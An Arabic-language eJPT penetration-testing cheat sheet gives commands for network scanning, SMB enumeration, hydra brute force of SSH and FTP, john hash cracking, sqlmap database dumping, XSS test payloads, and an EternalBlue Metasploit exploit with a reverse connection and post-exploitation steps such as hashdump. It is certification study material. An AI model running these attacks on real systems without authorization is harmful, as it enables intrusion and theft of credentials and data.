# Ejpt Cheat Sheet

## Initial scan&#x20;

```
nmap -sn 192.168.1.0/24 # بيكتشف الاجهزه الشغاله داخل الشبكه 
fping -ag 192.168.1.0/24 2>/dev/null # نفس عمل nmap ممكن تحتاجها لاحقا 
```

### Nmap Scans&#x20;

```
sudo nmap -A 192.168.1.5 -oN scan.txt # -A = -sV -sC -O --traceroute 
# هنا بنفحص اشهر 1024 بورت داخل الجهاز مع الاصدار ونوع الجهاز
```

### Vulnerabilities Scans&#x20;

```
nmap -p 80,135,445,139 192.168.1.5 --script=vuln -oN vuln.txt
# هنا حددنا البورتات اللي اكتشفناها داخل Nmap Scan مع تحديد السكربتات لتحديد
الثغرات ونحفظ الملف 
```

## Enumration&#x20;

### HTTP/s  Enumration&#x20;

> Default Port : 80

```
gobuster dir -u http://192.168.1.5 -w /word/list/path -x php,txt -t 25 
# نشغل اداه gobuster مع تحديد الرابط واللسته للتخمين على المسارات 
-x = نحدد الاضافات داخل اللسته 
-t = نحدد الثريد او السرعه 
```

### SMB Enumration&#x20;

> Default Port : 139,445

```
enum4linux -a 192.168.1.5 
 عشان نفحص المجلدات , اليوزرات , سياسه الباسووردات و القروبات
```

![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-Ml-tdKTFzBp4Ms6tSNe%2F-Ml0-fycSZOiuIHRsi0Q%2Fsmb3.png?alt=media\&token=639d74b0-4ecc-47b6-89d5-286318d5b57f)

هنا اكتشفنا مسارات \
WorkSharing , FrankDocs , ADMIN$ , C$ 4 \
حالات الاستعلامات داخل الصوره = OK / DENIED | Mapping / Listing \
هنا قدرنا نحدد المجلد نقدر ندخل عليه واللي هو WorkSharing&#x20;

```
smbclient -L 192.168.1.5 
# نفحص المجلدات اللي مسموح لنا ندخل عليها باستخدام -L
بتكون المخرجات بنفس اداه enum4linux
```

### Brute Force

التخمين على الخدمات مثل FTP , SSH بإستخدام اداه hydra&#x20;

```
hydra -l root -P /opt/pass.txt ssh://192.168.1.5 -V -t 10 
hydra -l root -P /opt/pass.txt ftp://192.168.1.5 -V -t 10
# -l = تحديد اليوزر | # -P تحديد لسته الباسووردات 
# service://IP = ssh , ftp . snmp , http الخ 
# -V = verbose mode ف تكون المخرجات اكثر | -t لتحديد الثريد او السرعه    
```

طبعا لسته اليوزرات والباسسوردات بتكون داخل ملف اختبار eJPT&#x20;

### Crack hashes&#x20;

بنستخدم اداه john لمطابقه الهاشات.  لنفترض ان بطريقه ما حصلنا على هاش ليوزر معين وحفظناه داخل ملف hash.txt&#x20;

```
john hash.txt --wordlist=pass.txt 
# ممكن الاداه م تشتغل وتضطر تحدد نوع الهاش 
# --format=sha512crypt for /etc/shadow hashing 
john hash.txt --wordlist=pass.txt --format=sha512crypt
```

## Getting Foothold&#x20;

### SQL Injection&#x20;

بعد م اكتشفنا بورتات مفتوحه لخدمه HTTP/s نبدأ نفحصها وندور اي باراميتر ونجرب الحقن اليدوي بإستخدام ' \
في حال اكتشفنا خطأ ظهر لنا بعد الحقن معناته الباراميتر قابل للحقن ف نستخدم اداه sqlmap&#x20;

```
sqlmap http://192.168.1.5/test.php?id=1 --batch --dbs 

# هنا بيحاول يطلع لنا اسامي قواعد البيانات ولنفترض حصلنا على قاعدتين
 
# 1-information_schema | 2 - users 

القاعده الاولى موجوده افتراضيا ف نبدأ نحاول نجيب اسامي tables لقاعده users #

sqlmap http://192.168.1.5/test.php?id=1 --batch -D users --tables

# لنفترض اكتشفنا معلومات ولنفرض انها
login , books , songs , messages

# نبدأ نختار الاهم وهو login
sqlmap http://192.168.1.5/test.php?id=1 --batch -D users -T login --columns 
# هنا لنفترض وحجدنا الاعمده التاليه
user , pass, CC , email 

 # نبدأ نطلع المعلومات
sqlmap http://192.168.1.5/test.php?id=1 --batch -D users -T login -C user,pass,CC,email --dump

هنا قدرنا نحقن ونطلع المعلومات المهمه اللي ممكن نحتاجها

```

### Cross-site Scripting

ثغره Cross site scripting او xss تعطينا الصلاحيات اننا ننفذ اوامر javascript على الموقع \
طبعا الانواع مختلفه وبوضح اهم نوعين منها \
Reflected XSS \
Stored XSS \
انواع الحقن الاكثر شهره داخل POST , GET \
امثله على Reflected XSS = خانه البحث داخل الموقع , صفحه تسجيل الدخول , البارميترز ... \
امثله على Stored XSS = خانه التعليقات , صفحه المعلومات الشخصية ...

```
http://192.168.1.5/index.php?search=<script>alert(1)</script>
# اذا تنفذ الحقن بكذا بيكون عندنا رفلكتد xss

http://192.168.1.5/posts/1/#comments 
لنفترض هنا نقدر نرسل اي كومنت او تعليق
نجرب داخل خانه الاسم او التعليق

name=<script>alert(1)</script>,comment=<script>alert(1)</script>
ونرسل التعليق وفي حال تنفذ هنا بتكون stored xss
```

### SMB EternalBlue

احد الثغرات المشهوره جدا على بورت SMB هي EternalBlue او MS17-010 \
طبعا انظمه كثيره من Windows مصابه بالثغره ف نحاول نفحص ب nmap الاجهزه اللي عليها البورت مفتوح&#x20;

```
nmap 192.168.1.5 -p 139,445 --script=smb-vuln* 

في حال كان مصاب نرجع للنتائج الفحص الاول ونشوف اصدار الجاهز ونبدأ نستغل الثغره
بإستخدام اداه metasplit
```

### Metasploit Framework&#x20;

```
msfconsole # نشغل الاداه 
search eternalblue # نبحث عن استغلالات خاصه بالثغره 
use "EXPLOIT" # نحدد الاستغلال اللي نبيه مكان EXPLOIT

 set rhosts 192.168.1.5 # الجهاز المصاب  
 set lhost 192.168.1.6  # جهازي 
 set rport 445 # بورت خدمه smb 
 set lport 4444 # البورت داخل جهازي عشان يجيني الاتصال 
 exploit OR run # حميع الامرين بتنفذ الاستغلال واذا كان صحيح بنكون اخترقنا الجهاز
```

نجي لبعض الاوامر المهمه بعد م نخترق الجهاز ممكن تفيدنا&#x20;

```
hashdump 
# الامر بيعطينا اليوزرات مع الهاش الخاص باليوزر "ممكن تحتاج تكسره مستقبلا"

search -f filename C:\Users
# عشان نبحث عن ملف معين داخل النظام

ipconfig 
# امر مهم يفيدنا داخل عمليه الراوتنق بعدين

route 
# الامر بيتيح لنا نشوف معلومات routing table

shell 
# عشان نغير من جلسه meterpreter الى cmd
```

## Routing&#x20;

SOON&#x20;
